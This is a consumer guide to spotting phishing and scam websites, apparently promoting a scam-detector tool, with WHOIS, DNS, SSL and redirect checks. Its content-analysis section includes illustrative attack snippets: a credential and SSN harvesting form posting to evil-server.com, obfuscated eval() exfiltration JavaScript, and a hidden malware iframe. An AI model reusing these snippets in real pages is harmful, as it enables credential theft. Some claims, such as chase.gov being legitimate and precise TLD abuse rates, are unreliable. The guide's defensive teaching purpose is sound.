Scam Detector Complete Guide: Phishing Detection, Website Security Analysis & Fraud Prevention

Introduction: The $10 Billion Online Scam Crisis

The “Verify Your Account” Email That Cost $47,000

Monday morning. Sarah, a small business owner, receives an urgent email: “Your PayPal account has been suspended due to suspicious activity. Click here to verify your identity within 24 hours or lose access permanently.”

The email looks perfect—PayPal logo, professional formatting, even a customer service phone number. The urgency triggers panic. She clicks the link.

The website looks identical to PayPal. She enters her email, password, date of birth, social security number (for “verification”), and her bank routing number (to “confirm payment methods”). She even provides her driver’s license photo when prompted.

Within 3 hours:

$12,000 withdrawn from her business account
$8,500 charged to her credit cards
$26,500 loan application submitted in her name
Identity theft case opened (cost to resolve: 200+ hours, $47,000 in losses)

The website? Registered 8 days earlier. Hosted in a foreign country. No valid SSL certificate. Shutdown 36 hours after the attack.

A simple scam detection check would have revealed the fraud instantly—before she lost everything.

The Devastating Reality of Online Scams (2025)

According to the Federal Trade Commission (FTC), online scam statistics are staggering:

Financial Impact:

$10.3 billion lost to scams in 2023 (up from $8.8B in 2022)
Average loss per victim: $5,500
Most targeted: Adults 60+ ($770M in losses)
Fastest growing: Investment scams (cryptocurrency fraud)

Attack Volume:

2.4 million scam reports filed with FTC annually
467,000 phishing websites created monthly (APWG data)
1 in 4 Americans targeted by phishing attempts weekly
97% of phishing sites use domains less than 30 days old

Common Scam Types:

Phishing attacks (fake login pages): 36% of reports
E-commerce fraud (fake online stores): 28%
Investment scams (crypto, stocks): 18%
Romance scams (dating site fraud): 12%
Tech support scams (fake Microsoft/Apple): 6%

Reference: FTC Consumer Sentinel Report 2023

Who Needs Scam Detection Tools?

This comprehensive guide is critical for:

Online Shoppers: Verify e-commerce sites before entering payment information
Business Owners: Protect company credentials from phishing attacks
Elderly Users: Defend against targeted scams (tech support, healthcare fraud)
IT Security Teams: Add automated scanning to security workflows
Financial Institutions: Protect customers from fake banking sites
Parents: Check websites kids visit for safety
Investors: Verify investment platforms before depositing funds
Job Seekers: Identify fake job postings and recruitment scams

Use our Scam Detector to analyze any website instantly with 7-point security checks before entering personal information.

Quick Answer: How to Spot Scam Websites

Before we dive into 13,000 words of technical details, here’s what you need immediately:

Instant Red Flags (Close Website Immediately):

❌ No HTTPS lock icon (or “Not Secure” warning)
❌ Misspelled domain (paypa1.com instead of paypal.com)
❌ Urgent threats (“Account suspended!”, “Verify now or lose access!”)
❌ Too-good-to-be-true (iPhone 15 for $99, guaranteed investment returns)
❌ Poor grammar/spelling in official-looking emails
❌ Requests for unusual info (SSN, passwords via email)
❌ Payment only via wire/crypto (no credit card option)

Quick Safety Checks:

HTTPS: Look for padlock icon in address bar
Domain spelling: Verify exact company name (google.com not g00gle.com)
Domain age: Use WHOIS Lookup (scams = new domains)
Contact info: Search for legitimate address, phone number
Reviews: Google “[company name] scam” to see warnings

7-Point Security Analysis:

SSL/TLS Certificate Validation
Domain Age & WHOIS Data
DNS Configuration Health
Content Safety & Phishing Patterns
TLD (Domain Extension) Risk
HTTP Redirect Chain Analysis
Contact Information Verification

Risk Scores:

0-19: Low risk (safe to proceed)
20-44: Medium risk (verify independently)
45-69: High risk (avoid entering personal info)
70-100: Critical risk (close immediately, report)

Test Now: 👉 Analyze Website Safety

Understanding Scam Detection: Technical Deep Dive

What is Scam Detection? (The Science)

Definition:
Scam detection (also called phishing detection, fraud detection, or website security analysis) is the automated process of analyzing multiple security indicators to identify malicious websites designed to steal personal information, financial data, or distribute malware.

How It Works:
Our scam detector uses a multi-factor risk assessment algorithm combining:

Technical indicators: SSL certificates, DNS configuration, server infrastructure
Behavioral signals: Domain age, redirect patterns, hosting location
Content analysis: Phishing keywords, form structures, JavaScript obfuscation
Reputation data: Blacklists, known attack patterns, TLD abuse statistics

Standards and Frameworks:

APWG (Anti-Phishing Working Group): Industry standards for phishing detection
X.509 Certificates: RFC 5280 SSL/TLS validation
WHOIS Protocol: RFC 3912 domain registration data
DNS Security: RFC 4034 DNSSEC validation
Content Security: W3C standards for safe web practices

Why Automated Detection Matters:

Human limitations:

Can’t verify SSL certificate chains manually
Difficult to check domain registration dates
No easy way to analyze DNS infrastructure
Time-consuming to research website reputation

Automated advantages:

Instant analysis (5-30 seconds)
Multi-factor assessment (7+ indicators)
Objective scoring (no human bias)
Historical data comparison (known attack patterns)
Real-time threat intelligence

Reference: Anti-Phishing Working Group (APWG)

The Anatomy of a Phishing Attack

Typical Attack Flow:

Stage 1: Reconnaissance (Attacker Preparation)

1. Attacker selects target (PayPal, bank, popular service)
2. Registers similar domain:
   - Typosquatting: paypa1.com (1 instead of l)
   - Subdomain abuse: paypal.security-check.com
   - Homograph attack: рaypal.com (Cyrillic 'р' looks like 'p')
3. Sets up hosting (cheap VPS, bullet-proof hosting)
4. Clones target website (copies HTML, CSS, images)
5. Deploys fake login form (harvests credentials)

Stage 2: Delivery (Reaching Victims)

6. Sends phishing emails:
   - Spoofed sender: security@paypal.com
   - Urgent subject: "Account Suspended - Action Required"
   - Malicious link: paypa1.com/verify
7. Alternative delivery:
   - SMS phishing (smishing)
   - Social media messages
   - Malicious ads
   - QR codes

Stage 3: Exploitation (Credential Theft)

8. Victim clicks link, lands on fake site
9. Enters credentials:
   - Email/username
   - Password
   - 2FA codes (in real-time phishing)
   - Additional info (SSN, DOB, address)
10. Attacker harvests data instantly
11. Often redirects to real site (victim unaware)

Stage 4: Abuse (Identity Theft)

12. Attacker uses stolen credentials:
    - Drains bank accounts
    - Makes fraudulent purchases
    - Opens credit accounts
    - Sells credentials on dark web
13. Shuts down phishing site (within 24-48 hours)
14. Victim discovers fraud days/weeks later

Our Detection Points:

Attack Stage          Detection Method                   Tool Check
─────────────────────────────────────────────────────────────────────
Domain Registration → WHOIS age check                  → Domain Age
SSL Setup          → Certificate validation           → SSL Checker
Hosting Setup      → DNS infrastructure analysis      → DNS Lookup
Website Clone      → Content pattern matching         → Phishing Scan
Delivery           → Link reputation check            → URL Analysis

Common Scam Types (Taxonomy)

1. Credential Phishing

Definition: Fake login pages mimicking legitimate services

Examples:

Fake banking login (Chase, Bank of America, Wells Fargo)
Email provider spoofs (Gmail, Outlook, Yahoo)
Social media clones (Facebook, Instagram, LinkedIn)
E-commerce impersonation (Amazon, eBay, PayPal)

Characteristics:

Domain: Similar to legitimate (paypa1.com)
Design: Pixel-perfect copy of real login page
Request: Email + password + 2FA
Redirect: Often forwards to real site after theft

Detection:

Domain age: Usually <30 days
SSL: Self-signed or free certificate (not EV)
URL: Slight misspelling
Form action: Posts to external domain

Real Example:

Legitimate: https://www.paypal.com/signin
Phishing:   https://paypa1-secure.com/signin
            │       ││       └─ Looks official
            │       │└─ Number 1 instead of L
            │       └─ Hyphen added
            └─ Different domain

2. E-Commerce Scams

Definition: Fake online stores that take payment but never deliver

Examples:

Luxury goods at impossible prices (Rolex for $50)
Limited-time offers (iPhone 15 Pro: 90% off!)
Sold-out items mysteriously available
“Clearance” sales on brand-new products

Characteristics:

Pricing: 70-95% below market value
Payment: Wire transfer, cryptocurrency, gift cards only
Contact: Generic email (support@, info@)
Reviews: Fake or nonexistent

Detection:

Domain age: Brand new (0-14 days)
WHOIS: Privacy protection enabled
Contact info: No physical address, phone goes to voicemail
Social media: No presence or fake followers
Payment: No credit card option (only irreversible methods)

Verification Steps:

# Check domain age
whois example-shop.com | grep "Creation Date"
# Scam if: Created in last 30 days

# Check business registration
Search: "[Company Name] BBB" (Better Business Bureau)
Search: "[Company Name] business license [state]"
# Scam if: No registration found

# Check reviews
Search: "[Company Name] scam"
Check: Trustpilot, BBB, Reddit
# Scam if: Multiple scam reports

3. Investment Scams

Definition: Fake investment platforms promising guaranteed returns

Examples:

Cryptocurrency trading platforms (fake exchanges)
High-yield investment programs (HYIPs)
Ponzi schemes (Bernie Madoff-style)
Forex trading scams
“Get rich quick” schemes

Characteristics:

Returns: Guaranteed 10-50% monthly (impossible)
Testimonials: Fake success stories with stock photos
Urgency: “Limited spots available”
Minimum: Low entry barrier ($100-$500)
Withdrawal: Delays, excuses, eventually impossible

Detection:

Domain age: Very recent registration
SEC registration: Not registered with authorities
Physical location: Offshore or non-existent
Contact: Only through website form
Promises: Violate basic investment principles

Red Flags:

"Guaranteed returns"        → Impossible (no investment is guaranteed)
"No risk"                   → False (all investments have risk)
"Secret algorithm"          → Deceptive (legitimate firms explain strategies)
"Limited time offer"        → Pressure tactic
"Withdrawal fees required"  → Advance fee fraud

4. Tech Support Scams

Definition: Fake technical support claiming your computer is infected

Examples:

Microsoft/Windows Defender alerts
Apple/Mac security warnings
Antivirus renewal scams (Norton, McAfee)
Browser “virus detected” pop-ups

Characteristics:

Pop-ups: Flashing warnings, fake virus scans
Audio: Computer voice saying “Your computer is infected”
Lock: Browser locked with fullscreen message
Phone: Toll-free number to call “support”
Request: Remote access via TeamViewer, AnyDesk

Detection:

Domain: Not official Microsoft/Apple domain
Pop-up: Uses JavaScript to lock browser
Number: Not listed on official support pages
Scare tactics: Threats of data loss, legal action

Self-Defense:

1. Close browser (Ctrl+Alt+Delete → Task Manager → End Task)
2. Run real antivirus scan (Windows Defender, Malwarebytes)
3. Never call numbers from pop-ups
4. Never grant remote access to unknown parties
5. Report: https://reportfraud.ftc.gov/

5. Romance Scams

Definition: Fake romantic interest to extract money

Examples:

Dating site profiles (Tinder, Match, eHarmony)
Social media friend requests (Facebook, Instagram)
Email correspondence (lonely hearts scams)

Characteristics:

Profile: Attractive photos (often stolen from models)
Story: Military deployment, working abroad, widowed
Progression: Rapid emotional attachment (“I love you”)
Crisis: Sudden emergency (medical, travel, customs)
Request: Money via wire transfer or gift cards

Detection:

Photos: Reverse image search (stolen from internet)
Story: Consistent excuses to avoid video chat
Location: Claims to be local but can’t meet
Grammar: Poor English despite claiming to be American
Money: Always needs funds, never repays

Verification:

# Reverse image search
1. Save profile photo
2. Upload to Google Images (images.google.com)
3. Check if photo appears on multiple profiles
   → Scam if: Same photo with different names

# Video chat test
Request live video call
→ Scam if: Always has excuses (broken camera, shy, etc.)

# Story verification
Google specific details (unit number, hospital name)
→ Scam if: Details don't match reality

Reference: FBI Romance Scam Warning

The 7-Point Security Analysis System

1. SSL/TLS Certificate Validation

What We Check:

Certificate Authority (CA) Trust:

Is certificate issued by recognized CA?
- ✅ Trusted: Let’s Encrypt, DigiCert, Sectigo, GlobalSign
- ❌ Untrusted: Self-signed, unknown CA
Is CA in browser trust store?

Certificate Validity:

Check expiration:
  Not before: 2024-01-01 00:00:00 UTC  ← Valid start
  Not after:  2025-01-01 00:00:00 UTC  ← Check current date

  ✅ Valid if: Current date within range
  ❌ Invalid if: Expired or not yet valid

Hostname Verification:

Certificate issued for: www.example.com
Visiting:               www.example.com
✅ Match

Certificate issued for: legitimate-bank.com
Visiting:               1egitimate-bank.com (number 1, not letter l)
❌ Mismatch → Phishing attempt

Certificate Type:

Domain Validation (DV):
  - Verifies domain control only
  - Free (Let's Encrypt)
  - Issue time: Minutes
  → Used by 95% of sites (both legit and scam)

Extended Validation (EV):
  - Verifies legal business entity
  - Cost: $100-500/year
  - Issue time: Days (manual verification)
  → Rarely used by scammers (expensive, requires documentation)
  → Green bar in some browsers

Certificate Chain:

Complete chain:
  End-entity (server.crt) ← Your website
       ↓
  Intermediate (intermediate.crt) ← CA's intermediate
       ↓
  Root (root.crt) ← CA's root (in browser)

✅ Valid: All certificates present and valid
❌ Invalid: Broken chain (site won't load properly)

Check Your SSL: SSL Certificate Checker

Scam Indicators:

Indicator	Legitimate Site	Scam Site
HTTPS	✅ Yes (padlock icon)	❌ No (or self-signed)
CA	DigiCert, Let’s Encrypt	Unknown, self-signed
Hostname	Exact match	Slight misspelling
Age	Years old	Days/weeks old
Type	EV for banks	DV or none

Manual Verification:

Google Chrome:

1. Click padlock icon → Connection is secure
2. Click "Certificate is valid"
3. Check:
   - Issued to: www.paypal.com (exact match)
   - Issued by: DigiCert SHA2 High Assurance Server CA
   - Valid from: [past date] to [future date]
   - Status: ✓ This certificate is valid

Firefox:

1. Click padlock icon → Connection secure → More Information
2. View Certificate
3. Verify:
   - Subject: CN=www.paypal.com
   - Issuer: DigiCert Inc
   - Validity: Not Before / Not After dates

Command Line:

# Check SSL certificate
openssl s_client -connect example.com:443 -servername example.com </dev/null 2>/dev/null | openssl x509 -noout -text

# Extract specific fields
echo | openssl s_client -connect example.com:443 -servername example.com 2>/dev/null | openssl x509 -noout -subject -issuer -dates

# Output:
subject=CN = www.paypal.com
issuer=C = US, O = DigiCert Inc, CN = DigiCert TLS RSA SHA256 2020 CA1
notBefore=Nov 25 00:00:00 2023 GMT
notAfter=Dec 24 23:59:59 2024 GMT

Why Scammers Use HTTPS:

Common Misconception:

“HTTPS = Safe website” ❌ WRONG

Reality:

HTTPS encrypts connection (prevents eavesdropping)
Does NOT verify website legitimacy
Let’s Encrypt gives free certificates to anyone (including scammers)
80% of phishing sites now use HTTPS

What HTTPS Actually Means:

✅ Data encrypted between you and server
✅ Server has SSL certificate
❌ Server is trustworthy
❌ Website is legitimate
❌ Safe to enter personal information

Always check additional indicators beyond HTTPS!

2. Domain Age & WHOIS Analysis

Why Domain Age Matters:

Scammer Economics:

Domain cost: $10-15/year
Expected lifespan: 24-72 hours (before shutdown)
ROI threshold: 1-2 victims
Optimal strategy: Use disposable domains

Statistics:

97% of phishing sites use domains <30 days old
85% are <14 days old
60% are <7 days old
Average lifespan: 48 hours before takedown

Age-Risk Correlation:

Domain Age           Risk Level    Typical Use Case
───────────────────────────────────────────────────────────────
0-7 days             CRITICAL      Fresh phishing attack
8-30 days            HIGH          Scam site, test site
31-90 days           MEDIUM        New business (verify independently)
91-365 days          LOW           Established presence
1-5 years            VERY LOW      Legitimate business
5+ years             TRUSTED       Long-standing reputation

WHOIS Lookup Process:

What is WHOIS?

Internet database of domain registrations
Protocol: RFC 3912
Managed by: ICANN (Internet Corporation for Assigned Names and Numbers)
Data: Registrant, registrar, dates, nameservers

Command Line WHOIS:

whois example.com

# Key fields to check:
Domain Name: EXAMPLE.COM
Registrar: GoDaddy, Namecheap, etc.
Creation Date: 1995-08-14T04:00:00Z  ← Registration date
Expiry Date: 2025-08-13T04:00:00Z    ← When it expires
Updated Date: 2024-07-01T10:15:30Z   ← Last modification

Registrant:
  Organization: Example Inc.
  State: California
  Country: US
  Email: admin@example.com

Name Server: ns1.example.com
Name Server: ns2.example.com

Red Flags in WHOIS:

1. Privacy Protection:

Legitimate:
  Registrant: PayPal Inc.
  Address: 2211 North First Street, San Jose, CA 95131
  Email: domains@paypal.com

Scam:
  Registrant: REDACTED FOR PRIVACY  ← Hidden identity
  Address: REDACTED FOR PRIVACY
  Email: REDACTED FOR PRIVACY

  → Not illegal, but scammers use this to hide

2. Offshore Registrars:

High-Risk Registrars (abuse-friendly):
  - Registrars in countries with weak enforcement
  - "Bullet-proof" hosting providers
  - Privacy-focused registrars popular with scammers

Check: whois example.com | grep "Registrar:"
Red flag if: Unknown or offshore registrar

3. Recent Updates:

Creation Date: 2024-11-25  ← Domain created 5 days ago
Updated Date:  2024-11-25  ← No changes since creation

Red flags:
  - Domain age less than 30 days
  - Registrant info updated recently (ownership change)
  - Expiration date only 1 year out (scammers don't renew long-term)

4. Disposable Email:

Registrant Email: temp123@protonmail.com  ← Disposable email
Registrant Email: admin@yopmail.com       ← Temp email service

Legitimate:
Registrant Email: legal@company.com       ← Corporate email

Use Our Tool: Domain Age Checker

Case Study: PayPal Phishing

Legitimate PayPal:

whois paypal.com

Domain Name: PAYPAL.COM
Registrar: MarkMonitor Inc.
Creation Date: 1999-03-04  ← 25 years old
Registrant: PayPal Inc.
Address: 2211 North First Street, San Jose, CA 95131
Country: US
Name Servers: ns1.p57.dynect.net, ns2.p57.dynect.net

Phishing Site:

whois paypa1-secure.com

Domain Name: PAYPA1-SECURE.COM
Registrar: Namecheap Inc.
Creation Date: 2024-11-20  ← 10 days old ❌
Registrant: REDACTED FOR PRIVACY  ← Hidden ❌
Address: REDACTED FOR PRIVACY
Country: PA  ← Panama (offshore) ❌
Name Servers: ns1.cheapdns.com  ← Free DNS ❌

Instant Verdict: SCAM

3. DNS Configuration Health

What is DNS Analysis?

DNS (Domain Name System):

Translates domain names to IP addresses
Example: example.com → 93.184.216.34
Multiple record types: A, AAAA, MX, NS, TXT, etc.
Managed by authoritative nameservers

Why DNS Matters for Scam Detection:

Legitimate sites have robust DNS infrastructure
Scammers use cheap, minimal DNS setups
DNS patterns reveal hosting quality
Fast DNS = professional setup, slow = amateur

DNS Records Analyzed:

A Record (IPv4 Address):

dig A example.com +short
93.184.216.34

Check:
  ✅ IP resolves quickly (<100ms)
  ✅ IP belongs to reputable hosting (AWS, Google, Cloudflare)
  ❌ IP in known malicious ranges
  ❌ IP changes frequently (fast-flux DNS)

Nameserver Records (NS):

dig NS example.com +short
ns1.example.com
ns2.example.com

Legitimate sites:
  - 2+ nameservers (redundancy)
  - Reputable providers:
    • Cloudflare: ns1.cloudflare.com
    • AWS Route53: ns-1234.awsdns-56.com
    • Google Cloud DNS: ns-cloud-a1.googledomains.com

Scam sites:
  - Single nameserver (no redundancy) ❌
  - Free DNS services (freeDNS, No-IP) ❌
  - Unknown/sketchy providers ❌

MX Records (Email):

dig MX example.com +short
10 mail.example.com

Legitimate:
  - Valid MX records present
  - Professional email provider:
    • Google Workspace: aspmx.l.google.com
    • Microsoft 365: example-com.mail.protection.outlook.com
    • Proofpoint, Mimecast (enterprise email security)

Scam:
  - No MX records ❌ (can't receive email)
  - Generic/free email ❌ (mail.cheaphost.com)

TXT Records (Domain Verification):

dig TXT example.com +short

Look for:
  ✅ SPF record: "v=spf1 include:_spf.google.com ~all"
  ✅ DKIM records: Email authentication
  ✅ DMARC: "v=DMARC1; p=reject;"
  ✅ Domain verification: "google-site-verification=..."

Absence of these records suggests:
  - No email sending (scam site)
  - No domain verification (not claimed by business)

DNS Response Time:

# Measure DNS query time
dig example.com | grep "Query time"
;; Query time: 23 msec  ← Fast (good sign)

Fast DNS (<100ms):
  ✅ Professional DNS hosting
  ✅ Geographically distributed nameservers
  ✅ High-quality infrastructure

Slow DNS (>500ms):
  ❌ Cheap shared hosting
  ❌ Overloaded DNS servers
  ❌ Amateur setup

Use Our Tool: DNS Lookup Tool

Hosting Provider Analysis:

IP Geolocation:

# Get IP address
dig example.com +short
93.184.216.34

# Lookup IP owner (WHOIS)
whois 93.184.216.34 | grep "OrgName"
OrgName: Edgecast Inc.  ← Legitimate CDN

Legitimate hosting:
  ✅ Amazon AWS
  ✅ Google Cloud
  ✅ Microsoft Azure
  ✅ Cloudflare
  ✅ DigitalOcean
  ✅ Known reputable providers

Suspicious hosting:
  ❌ Offshore providers (Russia, China for US-targeted scams)
  ❌ "Bullet-proof" hosts (ignore abuse reports)
  ❌ Residential IPs (compromised home routers)
  ❌ Frequently changing IPs (fast-flux)

Reverse DNS (PTR Record):

# Check reverse DNS
dig -x 93.184.216.34 +short
example.com.  ← Matches forward lookup ✅

Legitimate:
  Forward:  example.com → 93.184.216.34
  Reverse:  93.184.216.34 → example.com
  ✅ Match confirms ownership

Scam:
  Forward:  scam-site.com → 123.45.67.89
  Reverse:  123.45.67.89 → shared-hosting-123.cheaphost.com
  ❌ Mismatch indicates shared/temporary hosting

DNS Propagation:

# Check DNS consistency across multiple servers
dig @8.8.8.8 example.com +short     # Google DNS
dig @1.1.1.1 example.com +short     # Cloudflare DNS
dig @208.67.222.222 example.com     # OpenDNS

✅ Same result = Stable DNS
❌ Different results = DNS manipulation or propagation issues

Real-World Example:

Legitimate (Amazon.com):

$ dig amazon.com +short
205.251.242.103
176.32.103.205
176.32.98.166
# Multiple IPs (load balancing)

$ dig NS amazon.com +short
ns1.p31.dynect.net.
ns2.p31.dynect.net.
ns3.p31.dynect.net.
ns4.p31.dynect.net.
# 4 nameservers (redundancy)

$ dig MX amazon.com +short
10 amazon-smtp.amazon.com.
# Enterprise email infrastructure

Scam (Fake Amazon):

$ dig amaz0n-deals.com +short
45.123.45.67
# Single IP (no redundancy) ❌

$ dig NS amaz0n-deals.com +short
ns1.freehosting.com
# Free DNS service ❌

$ dig MX amaz0n-deals.com +short
# No MX records ❌ (can't receive email)

Verdict: Scam site with amateur infrastructure

4. Content Safety & Phishing Pattern Scan

HTML/JavaScript Analysis:

Phishing Keywords Detection:

Urgency Keywords:

<!-- Scam site HTML -->
<h1>URGENT: Your account will be suspended!</h1>
<p>Verify your identity within 24 hours or lose access permanently</p>

Keywords triggering alerts:
  - "urgent", "immediately", "within 24 hours"
  - "suspended", "locked", "frozen"
  - "verify", "confirm", "update"
  - "unusual activity", "suspicious login"
  - "click here now", "act fast"

Scarcity Tactics:

<!-- Fake sale -->
<h2>ONLY 3 LEFT IN STOCK!</h2>
<p>Sale ends in: <span id="countdown">00:05:27</span></p>

Patterns:
  - Fake countdown timers (JavaScript)
  - "Limited time offer" (resets when page reloads)
  - "Only X remaining" (always shows same number)

Authority Impersonation:

<!-- Impersonating official entity -->
<title>Internal Revenue Service - Tax Refund</title>
<img src="irs-logo.png" alt="IRS Official Seal">

Red flags:
  - Government agency impersonation
  - Law enforcement threats
  - Financial institution clones
  - Tech company spoofs (Microsoft, Apple)

Form Analysis:

Credential Harvesting Forms:

<!-- Legitimate login form (PayPal) -->
<form action="https://www.paypal.com/signin" method="POST">
  <input type="email" name="email" required>
  <input type="password" name="password" required>
  <button type="submit">Log In</button>
</form>
<!-- ✅ Form action goes to same domain -->

<!-- Phishing form -->
<form action="https://evil-server.com/steal.php" method="POST">
  <input type="email" name="email" required>
  <input type="password" name="password" required>
  <input type="text" name="ssn" placeholder="SSN for verification">
  <button type="submit">Log In</button>
</form>
<!-- ❌ Form posts to external domain -->
<!-- ❌ Requests unusual info (SSN) -->

Password Fields Without HTTPS:

<!-- Page URL: http://example.com (no HTTPS) -->
<input type="password" name="password">
<!-- ❌ Password transmitted in plaintext -->

JavaScript Obfuscation:

Legitimate JavaScript:

// Readable, minified but understandable
function validateForm(e){
  const email=document.getElementById("email").value;
  if(!email.includes("@")) {
    alert("Invalid email");
    return false;
  }
  return true;
}

Malicious JavaScript:

// Obfuscated, encoded, hidden functionality
eval(function(p,a,c,k,e,d){e=function(c){return c.toString(36)};
if(!''.replace(/^/,String)){while(c--){d[c.toString(a)]=k[c]||c.toString(a)}
k=[function(e){return d[e]}];e=function(){return'\\w+'};c=1};
while(c--){if(k[c]){p=p.replace(new RegExp('\\b'+e(c)+'\\b','g'),k[c])}}
return p}('0.1("2").3=4+5.6("7");',8,8,'document|getElementById|pass|value|
evil_server|form|getAttribute|action'.split('|'),0,{}))

// Decoded behavior: Steals form data, sends to attacker's server

Red Flags:

eval() function (executes arbitrary code)
Base64 encoding: atob('aHR0cDovL2V2aWwuY29t')
Hexadecimal encoding: \x68\x74\x74\x70
Multiple layers of obfuscation
Minified variable names: _0x1a2b, $p1, __x

Hidden Elements:

Invisible iFrames:

<!-- Loads malicious content invisibly -->
<iframe src="https://malware-site.com/exploit"
        width="0"
        height="0"
        style="display:none">
</iframe>
<!-- ❌ Hidden iframe (delivers malware) -->

Fake CAPTCHA:

<!-- Looks like CAPTCHA but downloads malware -->
<div class="captcha">
  <p>Click "I'm not a robot" to continue</p>
  <button onclick="downloadMalware()">I'm not a robot</button>
</div>
<!-- ❌ Fake CAPTCHA triggers download -->

Meta Tag Analysis:

Legitimate Site:

<meta name="description" content="PayPal is the safer, easier way to pay online">
<meta name="author" content="PayPal Inc.">
<meta property="og:title" content="PayPal: Send Money, Pay Online or Set Up a Merchant Account">
<!-- ✅ Professional metadata -->

Scam Site:

<meta name="robots" content="noindex, nofollow">
<!-- ❌ Tells search engines not to index (hiding from Google) -->

<meta http-equiv="refresh" content="10;url=https://real-site.com">
<!-- ❌ Auto-redirects after stealing credentials -->

External Resource Loading:

Suspicious CDN Usage:

<!-- Legitimate -->
<script src="https://code.jquery.com/jquery-3.6.0.min.js"></script>
<!-- ✅ Official jQuery CDN -->

<!-- Suspicious -->
<script src="https://unknown-cdn.xyz/jquery.js"></script>
<!-- ❌ Untrusted CDN (could be backdoored) -->

Content Delivery Networks Used:

Legitimate CDNs:
  ✅ cdnjs.cloudflare.com
  ✅ cdn.jsdelivr.net
  ✅ unpkg.com
  ✅ code.jquery.com

Suspicious:
  ❌ Random domains
  ❌ Newly registered CDNs
  ❌ Offshore hosting

5. TLD (Top-Level Domain) Risk Assessment

TLD Abuse Statistics:

High-Risk TLDs (Free/Cheap Domains):

TLD	Cost	Abuse Rate	Common Scams
.tk	FREE	94%	Phishing, malware, spam
.ml	FREE	92%	Phishing, fake stores
.ga	FREE	91%	Malware distribution
.cf	FREE	90%	Phishing attacks
.gq	FREE	89%	Spam, phishing
.xyz	$1-2/yr	45%	Cryptocurrency scams
.top	$2-3/yr	42%	Fake investment sites
.club	$3-5/yr	38%	Adult scams, fake clubs

Why Free TLDs are Risky:

No registration barriers (instant signup)
No identity verification required
Easy to abandon after scam
Registrars have weak abuse policies
Freenom (tk, ml, ga, cf, gq) shuts down but domains still exist

Medium-Risk TLDs:

TLD	Risk	Notes
.info	35%	Information sites, but heavily abused
.biz	32%	Business sites, many fake businesses
.online	30%	Generic, popular with scammers
.site	28%	Generic, low entry barrier
.store	25%	E-commerce, many fake stores

Low-Risk TLDs:

TLD	Risk	Notes
.com	8%	Most common, still has scams but lower %
.net	7%	Network services, established reputation
.org	6%	Organizations, non-profits (better vetted)
.edu	<1%	Educational institutions (strict verification)
.gov	<0.1%	Government entities (extremely strict)
.mil	0%	Military (impossible to fake)

Country-Code TLDs (ccTLDs):

High-Risk ccTLDs (Abused):

.pw (Palau)       → Free, heavily abused
.cc (Cocos Islands) → Cheap, popular with scammers
.ws (Samoa)       → "Website" marketed, abused
.to (Tonga)       → URL shorteners, phishing
.ru (Russia)      → High malware distribution
.cn (China)       → Often used for fake stores

Low-Risk ccTLDs (Well-Managed):

.uk (United Kingdom) → Strong registry policies
.de (Germany)        → Requires local presence
.jp (Japan)          → Strict verification
.au (Australia)      → Identity verification required
.nl (Netherlands)    → Well-regulated
.ca (Canada)         → Canadian presence required

Specialized TLDs:

Trusted (Verified Entities):

.bank  → Only real banks (verified by fTLD Registry)
.insurance → Insurance companies only
.lawyer → Verified legal professionals
.pharmacy → Licensed pharmacies
.hospital → Healthcare facilities

Suspicious (Cheap, Generic):

.win   → "Win prizes!" scams
.loan  → Predatory lending scams
.click → Clickbait, malware
.download → Software scams, malware
.review → Fake review sites

TLD Red Flags:

def assess_tld_risk(domain):
    tld = domain.split('.')[-1]

    # Critical risk
    if tld in ['tk', 'ml', 'ga', 'cf', 'gq']:
        return 'CRITICAL - Free domain, 90%+ scam rate'

    # High risk
    if tld in ['xyz', 'top', 'club', 'win', 'loan']:
        return 'HIGH - Cheap domain, 40%+ scam rate'

    # Medium risk
    if tld in ['info', 'biz', 'online', 'site']:
        return 'MEDIUM - Verify independently'

    # Low risk
    if tld in ['com', 'net', 'org']:
        return 'LOW - Common TLD, still verify'

    # Trusted
    if tld in ['gov', 'edu', 'mil', 'bank']:
        return 'TRUSTED - Verified entity'

    return 'UNKNOWN - Research this TLD'

Real-World Examples:

Legitimate:

paypal.com      → .com (low risk TLD) ✅
chase.gov       → .gov (impossible to fake) ✅
harvard.edu     → .edu (verified university) ✅

Scam:

paypal-verify.tk    → .tk (free, 94% scam rate) ❌
amazon-deals.xyz    → .xyz (cheap, high abuse) ❌
apple-support.ml    → .ml (free, 92% scam rate) ❌

6. HTTP Redirect Chain Analysis

What are Redirects?

HTTP Status Codes:

301 Moved Permanently    → Permanent redirect (SEO-friendly)
302 Found                → Temporary redirect
303 See Other            → Redirect after POST
307 Temporary Redirect   → Preserves method (POST stays POST)
308 Permanent Redirect   → Preserves method

Legitimate Redirect Examples:

HTTP → HTTPS Upgrade:

User types: http://example.com
Redirect 1: 301 → https://example.com
Final: HTTPS site loads
✅ Good: Enforcing encryption

www → non-www (or vice versa):

User types: www.example.com
Redirect 1: 301 → example.com
Final: Canonical domain
✅ Good: URL canonicalization

Suspicious Redirect Patterns:

Multiple Redirects (Chain):

User clicks: http://click-here.com
Redirect 1: 302 → http://tracker1.com/?id=12345
Redirect 2: 302 → http://tracker2.com/?ref=ad
Redirect 3: 302 → http://affiliate.com/?src=email
Redirect 4: 302 → http://scam-site.com/
Final: Phishing page

❌ Bad: 4+ redirects (hiding true destination)

Cross-Domain Redirects:

User expects: Login to bank.com
Redirect 1: bank-security.com (fake domain)
Redirect 2: verify-bank.net (fake domain)
Final: bank.com (back to real domain, but credentials stolen)

❌ Bad: Redirects to different domains

Redirect Loop:

http://site-a.com → http://site-b.com
http://site-b.com → http://site-a.com
[Infinite loop until browser timeout]

❌ Bad: Broken configuration or intentional DoS

Testing Redirects:

cURL Method:

# Follow redirects and show each hop
curl -L -v https://example.com 2>&1 | grep -E "(< HTTP|< Location)"

# Output:
< HTTP/1.1 301 Moved Permanently
< Location: https://www.example.com/
< HTTP/1.1 200 OK

# Analysis:
# 1 redirect (301) from example.com to www.example.com
# ✅ Normal behavior

Browser DevTools:

1. Open DevTools (F12)
2. Network tab
3. Visit suspicious link
4. Check redirect chain:
   - Count number of redirects
   - Check each domain in chain
   - Look for cross-domain redirects

Python Script:

import requests

def analyze_redirects(url):
    response = requests.get(url, allow_redirects=True, timeout=10)

    print(f"Original URL: {url}")
    print(f"Final URL: {response.url}")
    print(f"Redirect count: {len(response.history)}")

    for i, redirect in enumerate(response.history, 1):
        print(f"Redirect {i}: {redirect.status_code} → {redirect.headers.get('Location')}")

    # Risk assessment
    if len(response.history) == 0:
        print("✅ No redirects (direct access)")
    elif len(response.history) <= 2:
        print("✅ Normal redirects (HTTP→HTTPS, www)")
    elif len(response.history) <= 5:
        print("⚠️  Suspicious (3-5 redirects, verify destination)")
    else:
